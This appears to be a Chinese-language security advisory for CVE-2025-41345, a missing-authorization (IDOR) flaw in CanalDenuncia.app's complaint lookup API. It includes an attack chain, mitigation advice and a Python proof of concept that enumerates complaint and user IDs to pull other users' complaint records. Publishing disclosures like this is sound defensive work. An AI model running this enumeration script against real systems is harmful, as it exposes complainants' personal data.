CVE-2025-41345 CanalDenuncia.app 授权缺失漏洞

漏洞信息

漏洞编号

CVE-2025-41345

漏洞类型

授权缺失/不安全的直接对象引用(IDOR)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CanalDenuncia.app

漏洞概述

CVE-2025-41345是CanalDenuncia.app应用中的一个高危授权缺失漏洞，CVSS评分7.5。该漏洞存在于后端API接口/buscarDenunciasById.php中，由于应用程序未能正确验证用户对资源的访问权限，攻击者可以通过构造恶意的POST请求，利用id_denuncia和id_user参数访问任意其他用户的投诉信息。攻击者无需任何认证凭证即可利用此漏洞，成功利用后可获取敏感的用户个人信息和投诉详细内容。此漏洞对系统机密性造成严重影响，评级为高危。建议相关单位尽快采取修复措施，避免用户数据泄露风险。

技术细节

该漏洞属于不安全的直接对象引用(IDOR)类型，源于应用程序对用户输入的访问控制验证不足。在/buscarDenunciaById.php接口中，攻击者只需提供有效的id_denuncia（投诉ID）和id_user（用户ID）参数即可查询对应数据，而服务器端未验证当前请求用户是否有权访问这些资源。攻击者可通过枚举不同的ID组合来批量获取系统中其他用户的敏感信息。CVSS向量显示攻击复杂度低(AC:L)、无需认证(PR:N)、无需用户交互(UI:N)，攻击者可远程(AV:N)利用此漏洞，造成高机密性影响(C:H)，但不影响数据完整性和可用性。修复方案应在服务端实现基于会话的用户身份验证，确保用户只能访问自己有权查看的资源。

攻击链分析

STEP 1

步骤1

攻击者发现CanalDenuncia.app的/buscarDenunciaById.php接口，该接口接受id_denuncia和id_user参数

STEP 2

步骤2

攻击者构造恶意POST请求，在请求体中注入目标用户的id_denuncia和id_user参数值

STEP 3

步骤3

由于服务器端未验证当前用户权限，攻击者无需认证即可成功发送请求

STEP 4

步骤4

服务器返回目标用户对应的投诉详细信息，包括个人身份信息和投诉内容

STEP 5

步骤5

攻击者通过枚举不同的ID组合，批量窃取系统中其他用户的敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-41345 PoC - IDOR in CanalDenuncia.app
# Target: /backend/api/buscarDenunciaById.php

TARGET_URL = "http://target.com/backend/api/buscarDenunciaById.php"

def exploit_idor(target_url, id_denuncia, id_user):
    """
    Exploit IDOR vulnerability by sending POST request with arbitrary id_denuncia and id_user
    """
    payload = {
        'id_denuncia': id_denuncia,  # Arbitrary complaint ID
        'id_user': id_user          # Arbitrary user ID
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0'
    }
    
    try:
        response = requests.post(target_url, data=payload, headers=headers, timeout=10)
        print(f"[*] Request sent for id_denuncia={id_denuncia}, id_user={id_user}")
        print(f"[*] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            print(f"[+] Response:\n{response.text}")
            return response.json()
    except Exception as e:
        print(f"[-] Error: {e}")
    
    return None

def enumerate_users(target_url, max_complaints=100, max_users=100):
    """
    Enumerate all complaints and user information
    """
    results = []
    for complaint_id in range(1, max_complaints + 1):
        for user_id in range(1, max_users + 1):
            result = exploit_idor(target_url, complaint_id, user_id)
            if result:
                results.append(result)
    return results

if __name__ == "__main__":
    # Single test case
    exploit_idor(TARGET_URL, 1, 1)

影响范围

CanalDenuncia.app (所有版本)

防御指南

临时缓解措施

在修复程序发布前，可通过以下措施临时缓解：1) 在Web应用防火墙(WAF)上配置规则，限制对/buscarDenunciaById.php接口的访问；2) 临时关闭该API端点；3) 实施IP白名单访问控制；4) 监控异常的数据访问请求模式。